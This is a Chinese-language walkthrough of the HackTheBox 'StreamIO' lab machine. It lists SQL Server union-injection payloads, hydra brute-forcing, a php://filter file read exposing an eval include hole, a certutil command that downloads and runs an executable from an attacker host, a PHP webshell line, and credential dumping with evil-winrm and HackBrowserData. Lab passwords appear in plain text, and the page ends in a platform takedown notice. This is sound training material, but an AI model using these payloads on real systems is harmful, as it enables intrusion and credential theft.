nmap -p- --min-rate 10000 -v -sV -sC -A -Pn 10.10.11.158
PORT STATE SERVICE VERSION
53/tcp open tcpwrapped
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open tcpwrapped
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp open tcpwrapped
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Issuer: commonName=streamIO/countryName=EU
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-02-22T07:03:28
| Not valid after: 2022-03-24T07:03:28
| MD5: b99a 2c8d a0b8 b10a eefa be20 4abd ecaf
|_SHA-1: 6c6a 3f5c 7536 61d5 2da6 0e66 75c0 56ce 56e4 656d
|_ssl-date: 2022-12-22T14:49:29+00:00; +6h59m59s from scanner time.
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49667/tcp open msrpc Microsoft Windows RPC
49674/tcp open tcpwrapped
49694/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h59m58s, deviation: 0s, median: 6h59m58s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-12-22T14:48:21
|_ start_date: N/A
http证书中有个子域名watch.streamIO.htb,AD域名为streamIO.htb。
10.10.11.158 watch.streamIO.htb DC.streamIO.htb streamIO.htb
配到host
nmap -n -sV --script "ldap* and not brute" 10.10.11.158
针对ldap扫描,结果中:
dnsHostName: DC.streamIO.htb
确认域控应该是dc.streamIO.htb都配进host
login.php,register.php,admin目录,admin目录没权限
但是注册成功的账号,无法登录
about页面找到三个员工Barry Oliver Samantha
尝试爆破了一下密码没成功,sql注入疑似waf
目录扫描发现search.php
feroxbuster -u https://watch.streamio.htb/ -k -x php
这里很奇妙,dirsearch硬是扫不出来
search.php
1' order by 5--+
但是用
1' union select 1,2,3,4--+
发现null也被ban了,那就直接数字
test' union select 1,2,3,4,5,6--+
测试到第6列时,第二列有回显
引号前面的正常数据还是有点选择的,直接输入1就是啥也没有
test' union select 1,@@version,3,4,5,6--+
确认sql server
test' union select 1,(select db_name()),3,4,5,6--+ #streamio
test' union select 1,(select db_name(1)),3,4,5,6--+ #master
test' union select 1,(select user),3,4,5,6--+ #用户是db_user
#所有库名
test' union select 1,concat(name),3,4,5,6 from master..sysdatabases --+
查询dbo.sysobjects表中用户创建的表,获取其对应的id和name
因为只有一个字段回显,所以concat连一下
test' union select 1,concat(id,name),3,4,5,6 from dbo.sysobjects where xtype='U'--+
885578193 movies
901578250 users
users表一看就比较重要
test' union select top 1 1,name,3,4,5,6 from dbo.syscolumns where id=901578250 --+
ps.尝试半天,原来top 1要放在开头修饰, id=不要引号。对mssql还是不熟
最终payload:
test' union select top 4 1,name,3,4,5,6 from dbo.syscolumns where id=901578250 --+
只有四列
test' union select 1,concat(username,password),3,4,5,6 from users --+
这里有两个admin,应该有一个是我尝试注册的数据
拿admin hash上somd5解了一下,paddpadd。应该是rawmd5
john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5 hash.txt
john --show --format=Raw-MD5 hash.txt
但有一个问题它不会输出对应的hash,不太好匹配。
用--show=left可以输出没被解开的hash,排除掉之后,从上到下应该就是一一对应的.其实不处理也没什么关系。反正也就是后面爆破时间长点呗
用户名字典
admin
Alexendra
Austin
Barbra
Barry
Baxter
Bruno
Carmon
Clara
Diablo
Garfield
Gloria
James
Juliette
Lauren
Lenord
Lucifer
Michelle
Oliver
Robert
Robin
Sabrina
Samantha
Stan
Thane
Theodore
Victor
Victoria
William
yoshihide
密码字典
paddpadd
12345
$hadoW
$monique$1991$
%$clara
$3xybitch
##123a8j8w5123##
physics69i
!?Love?!123
!!sabrina$
highschoolmusical
!5psycho8!
66boysandgirls..
burp社区版爆破是单线程还是慢了点,用hydra吧
hydra -L user.txt -P pass.txt streamio.htb https-post-form "/login.php:username=^USER^&password=^PASS^:Login failed"
密码匹配上了。这次进入admin目录就有东西了
四个按钮点点,发现url格式是
/admin/?user=
/admin/?staff=
/admin/?movie=
/admin/?message=
fuzz一下参数,把线程数调低一半。因为网络太差。快了根本跑不出来
wfuzz -c -u "https://streamio.htb/admin/?FUZZ=" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -H 'Cookie: PHPSESSID=haaskhe3fcctn9ligs5700fv06' --hh 1678 -t 5
发现有个debug参数
带上cookie再扫一波目录
feroxbuster -u https://streamio.htb/admin/ -H "Cookie: PHPSESSID=mtknq38sr1n09sageshh5lpqbt" -x php --auto-tune -k
发现一个master.php
https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=master.php
<h1>Movie managment</h1>
<?php
if(!defined('included'))
die("Only accessable through includes");
if(isset($_POST['movie_id']))
{
$query = "delete from movies where id = ".$_POST['movie_id'];
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
$query = "select * from movies order by movie";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>
<div>
<div class="form-control" style="height: 3rem;">
<h4 style="float:left;"><?php echo $row['movie']; ?></h4>
<div style="float:right;padding-right: 25px;">
<form method="POST" action="?movie=">
<input type="hidden" name="movie_id" value="<?php echo $row['id']; ?>">
<input type="submit" class="btn btn-sm btn-primary" value="Delete">
</form>
</div>
</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<h1>Staff managment</h1>
<?php
if(!defined('included'))
die("Only accessable through includes");
$query = "select * from users where is_staff = 1 ";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
if(isset($_POST['staff_id']))
{
?>
<div class="alert alert-success"> Message sent to administrator</div>
<?php
}
$query = "select * from users where is_staff = 1";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>
<div>
<div class="form-control" style="height: 3rem;">
<h4 style="float:left;"><?php echo $row['username']; ?></h4>
<div style="float:right;padding-right: 25px;">
<form method="POST">
<input type="hidden" name="staff_id" value="<?php echo $row['id']; ?>">
<input type="submit" class="btn btn-sm btn-primary" value="Delete">
</form>
</div>
</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<h1>User managment</h1>
<?php
if(!defined('included'))
die("Only accessable through includes");
if(isset($_POST['user_id']))
{
$query = "delete from users where is_staff = 0 and id = ".$_POST['user_id'];
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
$query = "select * from users where is_staff = 0";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>
<div>
<div class="form-control" style="height: 3rem;">
<h4 style="float:left;"><?php echo $row['username']; ?></h4>
<div style="float:right;padding-right: 25px;">
<form method="POST">
<input type="hidden" name="user_id" value="<?php echo $row['id']; ?>">
<input type="submit" class="btn btn-sm btn-primary" value="Delete">
</form>
</div>
</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<form method="POST">
<input name="include" hidden>
</form>
<?php
if(isset($_POST['include']))
{
if($_POST['include'] !== "index.php" )
eval(file_get_contents($_POST['include']));
else
echo(" ---- ERROR ---- ");
}
?>
index.php中读到一个数据库管理员密码
$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
文件末尾可以看到一个很清晰的文件包含再eval,完全可以RCE
kali启一个http,放上rce.txt内容为
system("dir c:\\");
验证成功,通过这种方法确认web路径为c:\inetpub\streamio.htb
尝试写webshell
file_put_contents('c:\\inetpub\\streamio.htb\\yjh.php','<?php eval($_POST[a])?>')
没成功,还是找个能写的目录直接尝试上线吧
system("certutil -urlcache -split -f http://10.10.14.6:8000/1.exe c:\\programdata\\1.exe");
#第二次
system("c:\\programdata\\1.exe");
分别执行,成功上线
稍微搜集了下信息,如域用户列表net user /domain
Administrator Guest JDgodd
krbtgt Martin nikk37
yoshihide
尝试之前index.php中找到的数据库管理员密码,使用靶机自带的sqlcmd连接数据库
sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "select table_name from streamio_backup.information_schema.tables;"
sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "select * from users;"
在备份数据库中发现域用户nikk37的密码hash 389d14cb8e4e9b94b137deb1caf0612a
尝试winrm远程登录成功,获取到user flag
evil-winrm -u nikk37 -p 'get_dem_girls2@yahoo.com' -i streamio.htb
查看ls "c:\Program Files (x86)"
发现安装了firefox
HackBrowserData导出密码成功
UserName,Password,LoginURL,CreateDate JDgodd,password@12,,2022-02-22T02:41:51-08:00 yoshihide,paddpadd@12,,2022-02-22T02:41:24-08:00 nikk37,n1kk1sd0p3t00:),,2022-02-22T02:41:10-08:00 admin,JDg0dd1s@d0p3cr3@t0r,,2022-02-22T02:40:56-08:00
crackmapexec smb -u JDgodd -p broswer-pass.txt -d streamio.htb -dc streamio.htb
确认密码为JDg0dd1s@d0p3cr3@t0r
bloodhound搜集信息
bloodhound-python -u JDgodd -p "JDg0dd1s@d0p3cr3@t0r" -d streamio.htb -dc dc.streamio.htb -ns 10.10.11.158
ps.发现bloodhound-python -ns选项得用IP
但是bloodhound发现没路了。。。查看其余wp里可读取LAPS密码
但是测试发现并无权限。。。。
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。